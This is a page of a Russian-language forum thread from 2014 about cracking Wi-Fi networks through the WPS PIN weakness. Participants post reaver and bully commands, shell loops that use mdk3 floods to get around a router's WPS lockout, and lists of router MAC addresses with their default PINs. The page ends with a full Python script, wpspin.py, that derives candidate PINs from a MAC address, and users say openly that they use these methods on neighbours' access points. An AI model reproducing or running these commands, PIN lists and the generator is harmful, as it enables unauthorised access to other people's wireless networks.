Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup
Страницы :
1
2
3
4
5
6
7
[
8]
9
10
11
12
13
14
15
16
17
18
19
20
Попробовал я как ты посоветовал,толку 0. Теперь перебор вообще не идет.Первые несколько паролей подбирает и встает. По ходу она лочится на долго)
Забил на нее.
скоро все такие точки будут,лочатся навсегда будут или wps вообще не будет
binarymaster
05.03.2014, 12:44
Попробовал я как ты посоветовал,толку 0. Теперь перебор вообще не идет.Первые несколько паролей подбирает и встает. По ходу она лочится на долго)
Забил на нее.
Ещё, как вариант, установить задержку между пинами в 10 или 20 секунд. А может и больше.
На практике не проверял, всё это зависит от роутера, как он определяет нежелательную активность WPS.
Ещё, как вариант, установить задержку между пинами в 10 или 20 секунд. А может и больше.
На практике не проверял, всё это зависит от роутера, как он определяет нежелательную активность WPS.
а толку задержка.....если в прошивке роутера например стоит ограничение на перебор 10 пинов,а потом лок на определённое время или до перезагрузки
binarymaster
05.03.2014, 13:00
а толку задержка.....если в прошивке роутера например стоит ограничение на перебор 10 пинов,а потом лок на определённое время или до перезагрузки
Демотивировать любишь ты, заметил я...
Если так, то да. А если нет?)
Демотивировать любишь ты, заметил я...
Если так, то да. А если нет?)
ну так а что делать,если такие современные,свежие прошивки.....т.е блок wps после 10 переборов довольно на долго,у меня тут есть точки,которые залочились пол года назад и это не глюк(типа что просто показывает,что залочн впс)не перебирает и всё....написано,залочен впс..
Ну и вообще,даже если это не так,то таким образом открыть точку можно,но на это недели,месяцы уйдут....нафиг они нужны эти точки,нервы тратить и время....других в эфире что ли ненайдёться....
Товарищи, помогите побороть проблему! Есть поблизости точка с WPS. Пробовал перебором, дошло до 44410087, пароль не появился. Пробовал зайти по пину, ничего не получается. Я на эту точку забил в итоге. Потом через пару месяцев решил ещё раз её пробить заново, старые логи от reaver потерялись. В этот раз дошло до 44409920. И тоже ни ответа ни привета с паролем С пином не заходит. Сессию на этот раз я сохранил. Есть ли способ обойти защиту и узнать пароль от интернета? Сигнал от точки очень хороший, не хотелось бы её потерять.
binarymaster
06.03.2014, 11:33
Товарищи, помогите побороть проблему! Есть поблизости точка с WPS. Пробовал перебором, дошло до 44410087, пароль не появился. Пробовал зайти по пину, ничего не получается. Я на эту точку забил в итоге. Потом через пару месяцев решил ещё раз её пробить заново, старые логи от reaver потерялись. В этот раз дошло до 44409920. И тоже ни ответа ни привета с паролем С пином не заходит. Сессию на этот раз я сохранил. Есть ли способ обойти защиту и узнать пароль от интернета? Сигнал от точки очень хороший, не хотелось бы её потерять.
"Дошло до..." - это вы имеете ввиду, что перебор завершился, и reaver выдал, что пин верный? Или просто WPS отрубился, и последующие попытки идут в фейл?
"Дошло до..." - это вы имеете ввиду, что перебор завершился, и reaver выдал, что пин верный? Или просто WPS отрубился, и последующие попытки идут в фейл?
Перебор завершился. Смущает, что в двух случаях два разных пина и не по одному из них не заходит...
binarymaster
06.03.2014, 15:54
Перебор завершился. Смущает, что в двух случаях два разных пина и не по одному из них не заходит...
Пробовали эти пины через bully прогнать? Может поможет.
Скрин чего и зачем? Reaver завершает процесс на 100%, поля WPS PIN и ESSID есть, а WPA PSK нету.
ХМ.....так нафиг тогда ключ????всё....пин есть,уже можно подключиться, уже потом спокойно посмотреть ключ,если прям так нужен....
Перебор завершился. Смущает, что в двух случаях два разных пина и не по одному из них не заходит...
Похоже, что перебор не завершился, а уперся. Скажи первую половину мак адреса - может у кого были похожие случаи. Еще видел мнение, что это такая защита и нужно продолжать перебор пропустив проблемное место. Например если упирается в районе 4440хххх, то попробовать меняя лог-файл ривера продолжить перебор например с 4540 ну или откуда возможно будет.
ХМ.....так нафиг тогда ключ????всё....пин есть,уже можно подключиться, уже потом спокойно посмотреть ключ,если прям так нужен....
Блин, никто не читает похоже, говорю ведь, что по пину не заходит.
Похоже, что перебор не завершился, а уперся. Скажи первую половину мак адреса - может у кого были похожие случаи. Еще видел мнение, что это такая защита и нужно продолжать перебор пропустив проблемное место. Например если упирается в районе 4440хххх, то попробовать меняя лог-файл ривера продолжить перебор например с 4540 ну или откуда возможно будет.
34:08:04
Я вот насчёт такой хитрой защиты тоже подумал. А как лог изменить? Открыл блокнотом, там 4-х и 3-х значные цифры в ряд. Где что менять?
на всякий случай вот лог ривера-
http://gfile.ru/a5Slz
Блин, никто не читает похоже, говорю ведь, что по пину не заходит.
так тогда ривер не 100% отработал,как ты говоришь.....нужно было смотреть,пошли ли пакеты 5,6,если нет...то нифига первые 4 цифры не подобрало,неправильные они....
34:08:04
Я вот насчёт такой хитрой защиты тоже подумал. А как лог изменить? Открыл блокнотом, там 4-х и 3-х значные цифры в ряд. Где что менять?
Судя по твоему логу, ривер решил, что нашел пин. Но ты говоришь, что пин не подходит. Более того, ты говоришь, что ранее ривер тоже решил, что нашел пин, но он был немного другим. Да, это странно. Устройство от d-link и про него не известно, что оно может менять пины, скорее просто глючно работает.
У пользователей уже были случаи, когда ривер ошибочно фиксировал нахождение первой половины пина и потом буксовал на завершающей стадии. Может кто еще что-то подскажет, а я вижу два варианта продолжения:
1. Обойти проблемное место и проверить остальной диапазон ривером. Для этого в файле 340804DC5A20.wpc изменить первые три строки:
4540 (здесь подбирать число, чтобы начался перебор)
0
0
далее ничего не менять. Соседний файл reaver.db не трогать или удалить - он появится снова.
2. Перебирать программой bully. С параметром -S у нее тоже можно меняя лог-файл начать прямо с 4440000. Замечено, что в некоторых случаях bully лучше обрабатывает глючные ответы (перепроверяет до полного выяснения).
Algierd
Вообще-то с такими МАКами DLinkи у меня проходили без проблемм. Каким ривером работал?
Если 1.4, то попробуй 1.3. Меня не однократно спасал в подобных ситуациях.
reaver-1.3 -i mon0 -b 34:08:04C:5A:20 -vv
Был подобный случай. Использовал WIFISLAX 4.6, 3 раза одна и та же ерунда-буксует на одном и том же месте. Решил сделать последнюю 4-ю попытку, если не получится - да ну её к чертям. Запустил так же WIFISLAX, НО версию 4.7...и точка без пробуксовок капитулировала. Хотелось бы заметить, что в младшей версии пропущенных пинов обнаружить не удалось и до этого случая никаких проблем не было... Чертовщина какая-то.
Был подобный случай. Использовал WIFISLAX 4.6, 3 раза одна и та же ерунда-буксует на одном и том же месте. Решил сделать последнюю 4-ю попытку, если не получится - да ну её к чертям. Запустил так же WIFISLAX, НО версию 4.7...и точка без пробуксовок капитулировала. Хотелось бы заметить, что в младшей версии пропущенных пинов обнаружить не удалось и до этого случая никаких проблем не было... Чертовщина какая-то.
а уже то и 4.8 есть
Помогите.что прописывать в inflator при локе сети.
Лочит на 60с. Вот такая картина: Фото
В Kali Linux или WiFiSlax попробуй команды while true; do timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0; sleep 3; done; или
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
Мне очень помогло-сломал таких точек уже 4.
В Kali Linux или WiFiSlax попробуй команды while true; do timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0; sleep 3; done; или
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
Мне очень помогло-сломал таких точек уже 4.
Подскажите пожалуйста,в какое время вы включали этот алгоритм? Именно время суток. И за какое время сдались точки?
Подскажите пожалуйста,в какое время вы включали этот алгоритм? Именно время суток. И за какое время сдались точки?
Включал после 6 вечера, две точки оставлял на ночь, две точки сдались за 4-5 часов, т.к. пин начинался на 0 и 2, остальные среди ночи были готовы. На одной точке ривер доходил до 99,99% и пароля не дал, а булли с первого раза.
Vikhedgehog
09.03.2014, 22:18
Народ, не у кого не найдется WPS PIN от точек с таким мак адресом: 00-90-4C-C1-00-00 ?
У роутеров DIR-320 слетает мак адрес при перепрошивке и меняется на этот. Я вот подумал, значит у них и WPS PIN должен поменятся вместе с маком. Может он вообще у всех становится одинаковым? Может получится найти какую нибудь закономерность.
В нашем дворе у точки 00-90-4C-C1-00-00 пин был 87207026, а у вас?
PIN от точек с таким мак адресом: 00-90-4C-C1-00-00 ?
Может получится найти какую нибудь закономерность.
В нашем дворе у точки 00-90-4C-C1-00-00 пин был 87207026, а у вас?
По wpsdb.site40.net MAC Address: 00904c WPS PIN: 39246189
Vikhedgehog
12.03.2014, 03:27
Народ у кого есть личные базы с пинами, какое начало пина может быть у C4:3D:C7:69:9X:XX? Производитель netgear. Заранее спасибо.
binarymaster
12.03.2014, 11:31
Народ у кого есть личные базы с пинами, какое начало пина может быть у C4:3D:C7:69:9X:XX? Производитель netgear. Заранее спасибо.
C4:3D:C7:A9:7A:44 | 26214702
C4:3D:C7:85:CF:4C | 26013084
Начало скорее всего с 26, а дальше как получится, ибо база не велика по этому мак-адресу.
Кстати, по-моему у меня уже был похожий пост...
Vikhedgehog
14.03.2014, 00:54
C4:3D:C7:A9:7A:44 | 26214702
C4:3D:C7:85:CF:4C | 26013084
Начало скорее всего с 26, а дальше как получится, ибо база не велика по этому мак-адресу.
Кстати, по-моему у меня уже был похожий пост...
Вряд ли подойдет тк у меня была подобная точка и PIN начинался с 7119 Этот вопрос действительно уже кто-то задавал, но вторая часть мак адреса точки совсем не похожа на те что в базе, а значит и диапазон возможных пин кодов другой
Vikhedgehog
14.03.2014, 02:16
Начал составлять базу стандартных WPS пинов, выкладываю то что есть, может кто-то отсюда что-то новое узнает. Большую часть информации вытащил с помощью проги Router Scan. Без хлама.
/// D-Link DSL (BSSID: 1C:7E:E5, FC:75:16, 84:C9:B2, 28:10:7B, ...)
46264848
31957199
76229909
17084215
62327145
18836486
13090586
/// MTS/Huawei (BSSID: BC:76:70, 4C:ED:DE, ...)
52382734
/// Trendnet (BSSID: 00:14:D1):
99956042
95661469
/// OnLime/Upvel (BSSID: F8:C0:91, D4:BF:7F)
99956042
/// MGTS (BSSID: 00:1F:CE, ...)
ZTE = 13419622
Qtech = HEX-2-DEC
/// Rostelecom/Sagemcom
7C:03:D8:XX:XX:XX = 10864111
7C:03:4C:XX:XX:XX = 11105824
/// ZyXEL Keenetic I, II (BSSID: CC:5D:4E, CE:5D:4E, EC:43:F6, EE:43:F6, ...)
HEX-2-DEC
Еще заметил что у точек ASUS со старыми мак адресами (RT-G32, WL-520G) пин легко угадать, хоть алгоритм пока и неизвестен. Если 7-е и 8-е значение мак адреса точки есть в базе то первые 3 цифры совпадут, шансы 99,9% а чтоб найти четвертую нужно перебрать всего десятку кодов. На новых точках эту тему прикрыли.
20:CF:30:D6:B6:DE
40715186
20:CF:30:98:E5:40
00201605
20:CF:30:D6:49:46
40434629
20:CF:30:98:EE:EC
00226363
20:CF:30:99:1C:4F
00342551
20:CF:30:87:D2:B0
77644107
20:CF:30:CE:1B:E3
37378967
20:CF:30:99:20:A9
00353694
20:CF:30:99:1F:01
00349451
20:CF:30:E5:0F:9C
82460334
20:CF:30:99:15:2F
00324311
20:CF:30:D6:42:2F
40416472
20:CF:30:88:8A:FF
50748075
20:CF:30:98:E7:D0
00208161
E0:CB:4E:E4:AF:84
49871401
E0:CB:4E:7E:81:C1
57431208
E0:CB:4E:E4:9D:A4
49825640
E0:CB:4E:DC:EF:9D
21554872
E0:CB:4E:38:0F:E4
14762147
Мак адреса которые чуть-чуть по новее, видно что разработчики постепенно начали добавлять шум хоть и в небольшой степени:
48:5B:39:BC:4E:78
23408562
48:5B:39:BC:4C:9C
23403802
48:5B:39:D7:29:CA
41990742
48:5B:39:D7:34:C2
06708573
48:5B:39:BC:25:77
23303591
48:5B:39:BC:69:7B
23477711
48:5B:39:BD:24:A8
23956889
48:5B:39:BC:62:23
23458918
Если есть у кого что добавить, пишите! А так же, кому не жалко, выкладывайте пин коды от точек E0:CB:4E:XX:XX:XX, 20:CF:30:XX:XX:XX и 48:5B:39:XX:XX:XX
binarymaster
14.03.2014, 03:00
Если есть у кого что добавить, пишите!
20:CF:30:D6:0B:4D
40275970
20:CF:30:D6:0B:7A
40276427
20:CF:30:D6:0B:A5
40276854
20:CF:30:D6:12:E1
40295374
20:CF:30:D6:16:74
40304526
20:CF:30:D6:1B:C6
40318141
20:CF:30:D6:42:2F
40416472
20:CF:30:D6:49:46
40434629
20:CF:30:D6:4F:53
40450117
20:CF:30:D6:4F:85
40450612
20:CF:30:D6:B6:DE
40715186
20:CF:30:D6:B7:D0
40717609
Таки закономерности!
Если дело так и дальше пойдёт, то это очень радует
Возможно, на новых моделях не прикрыли. Просто мак адреса другие - другие пины.
Vikhedgehog
14.03.2014, 03:47
По похожему принципу нашел небольшую закономерность у точек TP-LINK. В отличии от ASUS 7, 8 и 9 значения мак адреса влияют на 2 часть пин кода (а 10, 11 и 12 на первую, возможно?). Тк TP-LINK встречается реже асуса (во всяком случае в Москве), то своей базы нет и беру из чужого поста.
F8:1A:67:8A:F1:04 06695972
F8:1A:67:97:22:18 78488113
F8:1A:67:C3:B3:90 92407213
F8:1A:67:CB:4F:E6 68474836
F8:1A:67:CB:53:D0 14721359
F8:1A:67:CB:57:FC 88821344
F8:1A:67:CC:E7:44 50042227
F8:1A:67:EC:91:EE 36735600
F8:1A:67:EC:99:3E 04165415
F8:1A:67:F8:40:F4 65597231
VladimirV
14.03.2014, 16:36
Тоже нашел неплохую закономерность:
================================================== ========
20:CF:30:87D0DD 8722C8 88562643 8900829-8856264=44565
20:CF:30:87E3AC 01325F 00784313 8905644-78431=
20:CF:30:87E53C 2CDE6E 29405268 8906044-2940526=
20:CF:30:884346 77D567 78534155 8930118-7853415=1076703
20:CF:30:98A519 000E99 00037372 10003737-3737=10000000
20:CF:30:98A5AB 000F2B 00038836 =10000000
20:CF:30:98A607 000F87 00039758
20:CF:30:98A61B 000F9B 00039956
20:CF:30:98E76F 0050EF 00207195
20:CF:30:98FA89 006409 00256094
20:CF:30:990FFB 00797B 00310994 10031099-31099=10000000
20:CF:30:993CB2 00A632 00425469 10042546-42546=10000000
20:CF:30:994013 00A993 00434119 10043411-43411=10000000
20:CF:30:99409B 00AA1B 00435475
20:CF:30:D61023 3D79A3 40288352 =10000000
20:CF:30:D67D5E 3DE6DE 40567983
20:CF:30:D68B4F 3DF4CF 40603674 14060367-4060367=10000000
20:CF:30:E4A644 32616D 33017419 14984772-3301741=11683031
20:CF:30:E4B3A4 5543CB 55879156 14988196-5587915=9400281
20:CF:30:E53BC8 5168F7 53352873
20:CF:30:E554AC 477746 46835901
20:CF:30:E56138 8EBC84 93543729
20:CF:30:E5623C 5EAA9E 62040624 15032892-6204062 16204062
20:CF:30:E5A424 7CC727 81774470 15049764-8177447=
================================================== =
в выделенном диапазоне если перевести вторую часть BSSID в из HEX в DEC и отнять 10 000 000 то получим первые 7 цыферок пина без передних 0 !!!
binarymaster- Спасибо за RouterScan
Осталось выяснить полный диапазон.
VasiliyP
14.03.2014, 18:46
Тоже нашел неплохую закономерность: если перевести вторую часть BSSID в из HEX в DEC и отнять 10 000 000 то получим первые 7 цыферок пина без передних 0 !!!
А если вторая часть BSSID меньше 10 000 000, то ничего отнимать не нужно? Если да, то это - всем известный метод hex->dec.
Vikhedgehog
14.03.2014, 19:43
Тоже нашел неплохую закономерность:
================================================== ========
20:CF:30:87D0DD 8722C8 88562643 8900829-8856264=44565
20:CF:30:87E3AC 01325F 00784313 8905644-78431=
20:CF:30:87E53C 2CDE6E 29405268 8906044-2940526=
20:CF:30:884346 77D567 78534155 8930118-7853415=1076703
20:CF:30:98A519 000E99 00037372 10003737-3737=10000000
20:CF:30:98A5AB 000F2B 00038836 =10000000
20:CF:30:98A607 000F87 00039758
20:CF:30:98A61B 000F9B 00039956
20:CF:30:98E76F 0050EF 00207195
20:CF:30:98FA89 006409 00256094
20:CF:30:990FFB 00797B 00310994 10031099-31099=10000000
20:CF:30:993CB2 00A632 00425469 10042546-42546=10000000
20:CF:30:994013 00A993 00434119 10043411-43411=10000000
20:CF:30:99409B 00AA1B 00435475
20:CF:30:D61023 3D79A3 40288352 =10000000
20:CF:30:D67D5E 3DE6DE 40567983
20:CF:30:D68B4F 3DF4CF 40603674 14060367-4060367=10000000
20:CF:30:E4A644 32616D 33017419 14984772-3301741=11683031
20:CF:30:E4B3A4 5543CB 55879156 14988196-5587915=9400281
20:CF:30:E53BC8 5168F7 53352873
20:CF:30:E554AC 477746 46835901
20:CF:30:E56138 8EBC84 93543729
20:CF:30:E5623C 5EAA9E 62040624 15032892-6204062 16204062
20:CF:30:E5A424 7CC727 81774470 15049764-8177447=
================================================== =
в выделенном диапазоне если перевести вторую часть BSSID в из HEX в DEC и отнять 10 000 000 то получим первые 7 цыферок пина без передних 0 !!!
binarymaster- Спасибо за RouterScan
Осталось выяснить полный диапазон.
Круто!! Позже еще посканю IP диапазоны и выложу больше WPS пинов, теперь ясно по какой логике они их генерируют!
binarymaster
15.03.2014, 01:11
Боюсь, что это новое открытие не открыло ничего нового...
Поскольку результат работы алгоритмов HexToDec() и HexToDec()-10000000 одинаковый.
Кстати, вот два экземпляра, которые такому алгоритму не поддаются:
20:CF:30:877:53
89371282
20:CF:30:87:E7:9E
89395264
Vikhedgehog
15.03.2014, 02:32
Боюсь, что это новое открытие не открыло ничего нового...
Поскольку результат работы алгоритмов HexToDec() и HexToDec()-10000000 одинаковый.
Кстати, вот два экземпляра, которые такому алгоритму не поддаются:
20:CF:30:877:53
89371282
20:CF:30:87:E7:9E
89395264
Хахах, я почему-то даже не ожидал что ASUS станут генерировать пин коды из мак адреса. Понятно что это действует только на старых моделях да и то не на всех но все таки может пригодится при взломе. Теперь буду рассматривать другие модели.
saimonyz
16.03.2014, 00:01
мож каму попала точка с F81:11:73:F7:0C TP-LINK TL-WR740N
VladimirV
16.03.2014, 01:27
Вот еще нашел немного!
==============================================
00:07:26:3EFCC5 1662149 -2465792 D-Link DIR-300 BSSID-2465792
00:07:26:4AAA48 2427464 -2465792 D-Link DIR-300 BSSID-2465792
==============================================
2C:AB:25:0F980A 1778954 +756992 D-Link DIR-300 + 756992
2C:AB:25:0F9CBE 1780158 +756992
2C:AB:25:3DC7FD 4805885 +756992
2C:AB:25:54E30B 6320139 +756992
2C:AB:25:551DFF 6335231 +756992
2C:AB:25:5AF8DD 6718941 +756992
2C:AB:25:61CE0F 7166735 +756992
2C:AB:25:69BDFE 7686910 +756992
==============================================
80:1F:02:12E8EC 4793708 +3554432 EDIMAX BR6428GN
80:1F:02:190CCA 5196106 +3554432
80:1F:02:2662DF 6070111 +3554432
80:1F:02:279152 6147538 +3554432
==============================================
80:1F:02:4915BE 8344126 +3554432 EDIMAX BR6228GNS
80:1F:02:4A3F4C 8420300 +3554432
80:1F:02:4F27F4 8742004 +3554432
80:1F:02:4F3DBE 8747582 +3554432
==============================================
30:85:A9:F5135C 1410780 -14650496 ASUS RT-N13U Rev BSSID-14650496
30:85:A9:F52938 1416376 -14650496 ASUS RT-N13U Rev BSSID-14650496
==============================================
50:46:5D:AEAC38 1728440 -9718912 ASUS RT-N13U Rev.B1 BSSID-9718912
50:46:5D:AEC93C 1735868 -9718912
50:46:5D:AF3D98 1765656 -9718912
50:46:5D:AF89D0 1785168 -9718912
==============================================
F4:6D:04:A1C4C8 7710536 -2891136 ASUS RT-N13U Rev.B1 BSSID-2891136
F4:6D:04:A1F864 7723748 -2891136
F4:6D:04:A237A8 7739944 -2891136
F4:6D:04:A25870 7748336 -2891136
==============================================
10:BF:48:4A2360 2818272 ASUS RT-N13U Rev.B1 -2040448
10:BF:48:4A237C 2818300 ASUS RT-N13U Rev.B1 -2040448
10:BF:48:4B4900 2893440 ASUS RT-N13U Rev.B1 -2040448
==============================================
Vikhedgehog
16.03.2014, 01:31
мож каму попала точка с F81:11:73:F7:0C TP-LINK TL-WR740N
Точки с таким мак адресом можно же вроде просто ривером ломать? Если прошивка новая и возникает лок то попробуй использовать mdk3.
Vikhedgehog
16.03.2014, 01:47
Вот еще нашел немного!
================================================== ======================================
00:07:26:3EFCC5 1662149 -2465792 D-Link DIR-300 BSSID-2465792
00:07:26:4AAA48 2427464 -2465792 D-Link DIR-300 BSSID-2465792
================================================== ======================================
2C:AB:25:0F980A 1778954 +756992 D-Link DIR-300 + 756992
2C:AB:25:0F9CBE 1780158 +756992
2C:AB:25:3DC7FD 4805885 +756992
2C:AB:25:54E30B 6320139 +756992
2C:AB:25:551DFF 6335231 +756992
2C:AB:25:5AF8DD 6718941 +756992
2C:AB:25:61CE0F 7166735 +756992
2C:AB:25:69BDFE 7686910 +756992
================================================== ======================================
80:1F:02:12E8EC 4793708 +3554432 EDIMAX BR6428GN
80:1F:02:190CCA 5196106 +3554432
80:1F:02:2662DF 6070111 +3554432
80:1F:02:279152 6147538 +3554432
================================================== ======================================
80:1F:02:4915BE 8344126 +3554432 EDIMAX BR6228GNS
80:1F:02:4A3F4C 8420300 +3554432
80:1F:02:4F27F4 8742004 +3554432
80:1F:02:4F3DBE 8747582 +3554432
================================================== ======================================
30:85:A9:F5135C 1410780 -14650496 ASUS RT-N13U Rev BSSID-14650496
30:85:A9:F52938 1416376 -14650496 ASUS RT-N13U Rev BSSID-14650496
================================================== ======================================
50:46:5D:AEAC38 1728440 -9718912 ASUS RT-N13U Rev.B1 BSSID-9718912
50:46:5D:AEC93C 1735868 -9718912
50:46:5D:AF3D98 1765656 -9718912
50:46:5D:AF89D0 1785168 -9718912
================================================== ======================================
F4:6D:04:A1C4C8 7710536 -2891136 ASUS RT-N13U Rev.B1 BSSID-2891136
F4:6D:04:A1F864 7723748 -2891136
F4:6D:04:A237A8 7739944 -2891136
F4:6D:04:A25870 7748336 -2891136
================================================== ======================================
Крутая тема Кстати, походу у точек с началом 60:A4:4C встречается похожая закономерность что и у старых диапазонов не смотря на то, что этот мак адрес бывает и у новых точек, так что возможно у асусов не у каждой модели свой генератор wps, а у каждого мак диапазона, что может облегчить дальнейший поиск закономерностей Вот что смог насканить:
60:A4:4C:A2:C6:94 02863245
60:A4:4C:26:25:ED 24147460
60:A4:4C:A6:49:A8 52421303
60:A4:4C:83:A1:1C 43053100
60:A4:4C:DE:25:78 64651439
60:A4:4C:86:54:7C 40403007
60:A4:4C:A3:A8:48 06432034
60:A4:4C:79:47:F8 24234047
60:A4:4C:3A:B6:A0 40122502
60:A4:4C:A3:85:D4 06072438
60:A4:4C:A4:86:9C 00120029
60:A4:4C:C6:93:84 42329343
Vikhedgehog
16.03.2014, 02:00
У меня полетела винда, выложил всю свою базу с соотношениями мак адрес - впс пин для точек асус через бэктрэк на хостинг
http://zalil.ru/a81Lh
Vikhedgehog
16.03.2014, 02:12
Спасибо за совет
binarymaster
16.03.2014, 02:58
Вот еще нашел немного!
This is хорошо!
На DIR-300 я кстати уже находил эту закономерность, и даже в скрипте её реализовал. Но это только на билайновских роутерах.
мож каму попала точка с F81:11:73:F7:0C TP-LINK TL-WR740N
F81:11:43:AC:B8 0203XXXX
saimonyz
16.03.2014, 14:02
F81:11:43:AC:B8 0203XXXX
о попробую
Vikhedgehog
16.03.2014, 19:19
Пока есть время, выкладываю еще сети, извините что не отсортированы по MAC. Тут не только ASUS, но и D-Link
BC:EE:7B:32:C5:D0
53575555
00:18:E7:EC:E4:A9
46328472
00:24:8C:75:A5:74
76691645
74:D0:2B:3B:2D:4C
04354031
60:A4:4C:A4:41:6C
12403042
60:A4:4C:F1:8F:C0
97133919
AC:22:0B:E9:DB:FC
47723405
D8:50:E6:AF:C1:A8
08274045
C8:60:00:92:38:EA
28567554
BC:EE:7B:93:A2:30
50095643
84:C9:B2:52:30:3D
23294356
E0:CB:4E:82:BF:42
47561953
84:C9:B2:4C:AE:C5
27667552
60:A4:4C:27:03:78
90384271
5C:D9:98:6B:D5:9C
19908564
5C:D9:98:6B:D3:F6
18584349
C8:60:00:67:85:98
18722178
74:D0:2B:3B:22:30
44324100
74:D0:2B:83:77:64
08872210
D8:50:E6:AF:CE:CC
04234005
74:D0:2B:82:F2:04
02343013
84:C9:B2:62:6B:44
36539048
74:D0:2B:5D:81:58
29310364
20:CF:30:CE:4D:77
33224336
84:C9:B2:4C:AF:57
29005734
D8:50:E6:42:92:4C
50122844
D8:50:E6:42:91:E0
64429700
C8:60:00:91:48:E2
31195324
1C:7E:E5:3D:FD:86
48798587
50:46:5D:00:04:50
57346601
C8:60:00:91:51:4A
18619263
08:60:6E:C0:A9:60
41327753
08:60:6E:CC:83:40
47435612
84:C9:B2:62:6E:2A
42322221
74:D0:2B:5D:88:10
10407011
AC:22:0B:EA:67:74
06124083
D8:50:E6:AC:D5:68
96996492
08:60:6E:21:C0:88
65995150
08:60:6E:E9:AA:88
58651674
00:26:5A:FF:46:90
56407082
D8:50:E6:94:10:10
65891087
50:46:5D:01:08:60
27973592
50:46:5D:CD:FF:18
76047077
C8:60:00:91:EC:C6
46433275
08:60:6E:21:D2:B0
49535471
74:D0:2B:3A:12:44
20126100
binarymaster
16.03.2014, 21:37
#!/usr/bin/env python
import sys, re
def pin_checksum(pin):
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
# http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
accum = 0
t = pin
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
return '%07i%i' % (pin, (10 - accum % 10) % 10)
def gen_hexdec(mac_str):
return (int(mac_str[6:12], 16) % 10000000)
def gen_beeline(mac_str):
return ((int(mac_str[6:12], 16) + 756992) % 10000000)
def gen_hexdec_hi(mac_str):
return ((~int(mac_str[6:12], 16) & 0xFFFFFF) % 10000000)
def gen_hexdec_di(mac_str):
return (~int(mac_str[6:12], 16) % 10000000)
def gen_hexdec_hda(mac_str):
return ((gen_hexdec_hi(mac_str) + gen_hexdec_di(mac_str)) % 10000000)
def gen_hexdec_hds(mac_str):
return ((gen_hexdec_hi(mac_str) - gen_hexdec_di(mac_str)) % 10000000)
def gen_hexdec_dhs(mac_str):
return ((gen_hexdec_di(mac_str) - gen_hexdec_hi(mac_str)) % 10000000)
def gen_hexdec2x(mac_str):
return (2*int(mac_str[6:12], 16) % 10000000)
def gen_hexdec3x(mac_str):
return (3*int(mac_str[6:12], 16) % 10000000)
def gen_hex1_add_hex2_dec(mac_str):
return ((int(mac_str[0:6], 16)+int(mac_str[6:12], 16)) % 10000000)
def gen_hex1_sub_hex2_dec(mac_str):
return ((int(mac_str[0:6], 16)-int(mac_str[6:12], 16)) % 10000000)
def gen_hex1_xor_hex2_dec(mac_str):
return ((int(mac_str[0:6], 16)^int(mac_str[6:12], 16)) % 10000000)
def main():
if len(sys.argv) != 2:
sys.exit('Usage: wpspin.py [BSSID]\n eg. wpspin.py 00:11:22:33:44:55\n')
mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
if len(mac_str) != 12:
sys.exit('check MAC format!\n')
print '\n1. Algorithm: Dec(Hex[6..12])\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec(mac_str))
print '\n Compatible devices:'
print ' - ZyXEL NDMS (CC:5D:4E, EC:43:F6, FE:F5:28, etc.)'
print ' - Some TRENDnet (00:14:D1)'
print ' - D-Link DIR-620 (90:94:E4)'
print ' - Huawei HG532e (34:6B:D3)'
print ' - ASUS RT-G32 (20:CF:30, 90:E6:BA, E0:CB:4E)'
print '\n2. Algorithm: Dec(Hex[6..12]) + 756992\n'
print ' WPS PIN: ', pin_checksum(gen_beeline(mac_str))
print '\n Compatible devices:'
print ' - Beeline DIR-300 (2C:AB:25)'
print '\n3. Algorithm: Dec(Inv(Hex[6..12]))\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec_hi(mac_str))
print '\n4. Algorithm: Inv(Dec(Hex[6..12]))\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec_di(mac_str))
print '\n5. Algorithm: Dec(Inv(Hex[6..12])) + Inv(Dec(Hex[6..12]))\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec_hda(mac_str))
print '\n6. Algorithm: Dec(Inv(Hex[6..12])) - Inv(Dec(Hex[6..12]))\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec_hds(mac_str))
print '\n7. Algorithm: Inv(Dec(Hex[6..12])) - Dec(Inv(Hex[6..12]))\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec_dhs(mac_str))
print '\n8. Algorithm: Dec(Hex[6..12]) * 2\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec2x(mac_str))
print '\n9. Algorithm: Dec(Hex[6..12]) * 3\n'
print ' WPS PIN: ', pin_checksum(gen_hexdec3x(mac_str))
print '\n10. Algorithm: Dec(Hex[0..6]) + Dec(Hex[6..12])\n'
print ' WPS PIN: ', pin_checksum(gen_hex1_add_hex2_dec(mac_str))
print '\n11. Algorithm: Dec(Hex[0..6]) - Dec(Hex[6..12])\n'
print ' WPS PIN: ', pin_checksum(gen_hex1_sub_hex2_dec(mac_str))
print '\n12. Algorithm: Dec(Hex[0..6]) xor Dec(Hex[6..12])\n'
print ' WPS PIN: ', pin_checksum(gen_hex1_xor_hex2_dec(mac_str))
if __name__ == "__main__":
main()
Обновил скрипт wpspin.py, добавил несколько простых алгоритмов. Может быть некоторые из них подойдут к каким-то роутерам.
